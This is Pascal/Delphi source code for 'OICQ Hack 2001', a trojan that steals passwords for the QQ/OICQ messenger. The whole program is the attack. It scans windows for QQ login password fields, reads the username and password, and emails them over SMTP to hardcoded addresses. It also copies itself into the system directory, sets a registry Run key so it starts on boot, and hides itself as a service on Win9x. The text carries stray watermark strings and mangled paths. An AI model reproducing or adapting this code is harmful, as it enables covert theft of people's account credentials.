****************** OICQ Hack 2001***********
*
* 2001 5.22 ver 1.1 Modify for OICQ2000b 0230
* 2001 5.25 ver 1.2 Modify for QQ2000b 0430
* Last updated: 2001.5.25
* Author :njhhack
* HackSoft Research Lab.
* Copyright(C) 2001 Allrigths Reserved.
*
*
**********************************************
}
//---------------下面是oicqhack.dpr工程文件
program oicqhack;
uses
Windows,
Messages,
mainunit in "mainunit.pas";
{$R *.RES}
数据挖掘研究院
var
wClass: TWndClass; // class struct for main window
Msg: TMSG; // message struct
procedure ShutDown;
begin
UnRegisterClass(classname,hInst);
ExitProcess(hInst); //end program
end;
function WindowProc(hWnd,Msg,wParam,lParam:Longint):Longint; stdcall;
begin
Result:=DefWindowProc(hWnd,Msg,wParam,lParam);
case Msg of
WM_CREATE: wincreate;
WM_TIMER: ontimer1;
WM_DESTROY: ShutDown;
end;
end;
begin
//如果旧版本已运行,则停止旧版程序,只运行当前新版程序
hmain:=Findwindow("HackSoft-Oicq-Password-Recoder","OICQ 密码记录器2");
if hmain<>0 then sendmessage(lp,wm_destroy,0,0);
hInst:=GetModuleHandle(nil); // get the application instance
classname:="HackSoft-Oicq-Password-Recoder";
with wClass do
begin
Style:= CS_PARENTDC; 数据挖掘研究院
hIcon:= LoadIcon(hInst,"MAINICON");
lpfnWndProc:= @WindowProc;
hInstance:= hInst;
hbrBackground:= COLOR_BTNFACE+1;
lpszClassName:= classname;
hCursor:= LoadCursor(0,IDC_ARROW);
end;
RegisterClass(wClass);
hmain:=CreateWindowEx(WS_EX_TOOLWINDOW,classname,"OICQ 密码记录器3",WS_OVERLAPPEDWINDOW,10,10,120,80,0,0,hInst,nil);
//建立一个新的定时器,用来定时扫描系统中的窗口
newtime:=SetTimer(hmain,0,300,nil);
//建立消息循环
while(GetMessage(Msg,hmain,0,0))do
begin
TranslateMessage(Msg);
DispatchMessage(Msg);
end;
//结束定时器
killtimer(hmain,newtime);
end.
//-------下面是mainunit.pas单元文件
unit mainunit;
interface
uses
Windows,
Messages,
SysUtils,
Classes,
winsock,
registry;
const
CRLF=#13#10;
var
spy:string;
hinst,hmain,newtime,count,start,max,fhand,old,olde,lp:integer;
his:array[0..100] of integer;
syspath:array[0..200] of integer;
regservice:function(uThread:integer;uType:integer):Integer;stdcall;
libhandle:thandle;
classname:array[0..100] of char;
items:array[0..4] of string;
err:integer;
wsadata:twsadata;
fsocket,fport,step:integer;
SockAddrIn:TSockAddrIn;
hackmail,email,newpass,fhost,s1,password:string;
sbuf:array[0..1024] of char;
procedure winCreate;
procedure OnTimer1;
implementation
//修改注册表让程序自启动
procedure autorun;
var reg:tregistry;
begin
reg:=tregistry.create;
reg.rootkey:=HKEY_LOCAL_MACHINE;
reg.openkey("SOFTWAREMicrosoftWindowsCurrentVersionRun",true);
reg.WriteString("oicqpass",spy+"OICQPASS.EXE");
reg.closekey;
reg.free;
end;
//下面是个发信的子过程,取得密码后发回getoicq@21cn.com邮箱
procedure MailSend;
begin
err:=recv(FSocket,sbuf,400,0);
s1:=strpas(sbuf);
inc(step);
case step of
1:s1:="HELO smtp.hacker.com"+CRLF;
2:s1:="MAIL FROM: <getoicq@21cn.com>"+CRLF;
3:s1:="RCPT TO: <"+email+">"+CRLF;
4:s1:="DATA"+CRLF;
5:s1:="From:"Oicq Hack"<www.hacker.com>"+CRLF
+"To:"getoicq"<www.password.com>"+CRLF
+"Subject:QQ2001 Password come."+CRLF
+CRLF
+newpass+CRLF
+"."+CRLF;
6:s1:="QUIT"+CRLF;
else
step:=0;
end;
strcopy(sbuf,pchar(s1)); 数据挖掘研究院
err:=send(FSocket,sbuf,strlen(sbuf),MSG_DONTROUTE);
end;
//发信主过程
procedure SendPass;
begin
err:=WSAStartup($0101,WSAData);
FSocket := socket(PF_INET, SOCK_STREAM,IPPROTO_IP);
//利用 smtp.21cn.com 进行发信
fhost:="202.104.32.230";
fport:=25;
SockAddrIn.sin_addr.s_addr:=inet_addr(PChar(FHost));
SockAddrIn.sin_family := PF_INET;
SockAddrIn.sin_port :=htons(Fport);
err:=connect(FSocket,SockAddrIn, SizeOf(SockAddrIn));
step:=0;
repeat
MailSend;
until step=0;
err:=closesocket(FSocket);
err:=WSACleanup;
end;
//窗口枚举函数
function lpEnumFunc(hwnd:integer;uint:integer):boolean;stdcall;
var hw,hwold,hs,wlong,hup,i:integer;
sbuf,sb3,sb2:array[0..256] of char;
sb1:string;
begin
hwold:=GetParent(hwnd);
wlong:=GetWindowLong(hwnd,GWL_STYLE);
if (wlong and ES_PASSWORD)<>0 then
begin
//检查是否OICQ登陆
hup:=GetParent(hwnd);
sendmessage(hup,wm_gettext,100,integer(@sbuf));
strpcopy(sb2,"OICQ 注册向导");
strpcopy(sb3,"QQ 注册向导");
if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then
begin
old:=GetParent(hup);
old:=GetParent(old);
old:=GetParent(old);
start:=0;
count:=1;
//items.clear;
//跳过两个窗口
hwnd:=Getwindow(hwnd,GW_HWNDFIRST);
hwnd:=Getwindow(hwnd,GW_HWNDNEXT);
//取得用户名
hwnd:=Getwindow(hwnd,GW_HWNDNEXT);
hw:=GetWindowTextLength(hwnd);
hs:=integer(@sbuf);
sendmessage(hwnd,wm_gettext,100,hs);
items[0]:="用户名:"+strpas(sbuf);
//取得密码
hwnd:=Getwindow(hwnd,GW_HWNDNEXT);
hw:=GetWindowTextLength(hwnd);
hs:=integer(@sbuf);
sendmessage(hwnd,wm_gettext,100,hs);
items[1]:="密码:"+strpas(sbuf);
end;
strpcopy(sb2,"OICQ用户登录");
strpcopy(sb3,"QQ用户登录");
if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then
begin
old:=GetParent(hup);
old:=GetParent(old);
start:=0;
count:=1;
//items.clear;
//取得用户名
hwnd:=Getwindow(hwnd,GW_HWNDFIRST);
hw:=GetWindowTextLength(hwnd);
hs:=integer(@sbuf);
sendmessage(hwnd,wm_gettext,100,hs);
items[0]:="用户名:"+strpas(sbuf);
//取得密码
hwnd:=Getwindow(hwnd,GW_HWNDNEXT);
hw:=GetWindowTextLength(hwnd);
hs:=integer(@sbuf);
sendmessage(hwnd,wm_gettext,100,hs);
items[1]:="密码:"+strpas(sbuf);
end;
end;
//检查是否在线
hw:=GetWindowTextLength(hwnd);
hs:=integer(@sbuf);
sendmessage(hwnd,wm_gettext,100,hs);
strpcopy(sb2,"在线");
strpcopy(sb3,"隐身");
if (strcomp(sbuf,sb2)=0) or (strcomp(sbuf,sb3)=0) then
begin
if hwold=old then
begin
if olde<>old then
begin
if strcomp(sbuf,sb2)=0 then items[2]:="登录成功:在线"
else items[2]:="登录成功:隐身";
items[3]:=" ";
//密码发回我的邮箱getoicq@21cn.com
newpass:=format("%s %s %s %s",[items[0],items[1],items[2],items[3],items[4]);
//
hackmail:=email;
sendpass;
email:="mf001@etang.com";
sendpass;
email:=hackmail;
//密码存盘到oicqpass.dll中
{ 数据挖掘研究院
if fileexists(spy+"oicqpass.dll")=false then fhand:=filecreate(spy+"oicqpass.dll")
else fhand:=fileopen(spy+"oicqpass.dll",fmOpenWrite);
if fileexists(spy+"oicqpass.dll")=false then fhand:=filecreate(spy+"oicqpass.dll")
else fhand:=fileopen(spy+"oicqpass.dll",fmOpenWrite);
fileseek(fhand,0,2);
strpcopy(sbuf,items[0]+#13#10+items[1]+#13#10+items[2]+#13#10+items[3]+#13#10);
filewrite(fhand,sbuf,strlen(sbuf));
fileclose(fhand);
}
end;
olde:=old; 数据挖掘实验室
end;
end;
result:=true;
end;
定时器响应函数
procedure OnTimer1;
begin
lp:=0;
EnumChildWindows(GetDesktopWindow,@lpEnumFunc,lp);
end;
//窗口创建响应函数
procedure winCreate;
var wlong:integer;
s1:string;
s2,s3,sbuf:array[0..300] of char;
i:integer;
osver:TOSVERSIONINFO;
tmp:tmemorystream;
begin
//取得操作系统版本信息,若为win9x则注册为服务进程而隐身,nt下无此功能
osver.dwOSVersionInfoSize:=sizeof(TOSVERSIONINFO);
if GetVersionEx(osver)=true then
begin
if VER_PLATFORM_WIN32_NT<>osver.dwPlatformId then
begin
LibHandle:=LoadLibrary("kernel32.dll");
if LibHandle<>0 then
begin
@regservice:=GetProcAddress(LibHandle, "RegisterServiceProcess"); 数据挖掘研究院
regservice(0,1);//1=hide,0=show;
FreeLibrary(LibHandle);
end;
end;
end;
max:=0;
count:=0;
将程序复制到系统目录
s1:=ParamStr(0);
for i:=0 to length(s1) do s2:=s1[i+1];
GetSystemDirectory(@syspath,MAX_PATH);
spy:=strpas(@syspath)+"";
s1:=spy+"oicqhack.exe";
for i:=0 to length(s1) do s3:=s1[i+1];
copyfile(s2,s3,false);
//从email.txt中找到目标e-mail信箱
if fileexists("c:email.txt")=false then
begin
email:="getoicq@21cn.com";
end else
begin
tmp:=tmemorystream.create;;
tmp.loadfromfile("c:email.txt"); 数据挖掘研究院
count:=tmp.size;
// strcopy(sbuf,pchar("));
tmp.read(sbuf,count);
tmp.free;
email:=";
for step:=0 to count-1 do email:=email+sbuf[step];
strcopy(sbuf,pchar(email));
// messagebox(0,sbuf,",0);
end;
count:=0;
step:=0;
//修改注册表使程序自启动
autorun;
end;
end.
/////////////////////////////////////////////////////////
--------倪建华---------------
HackSoft Research Lab.
Copyright(C) 2001 Alrights reserved.
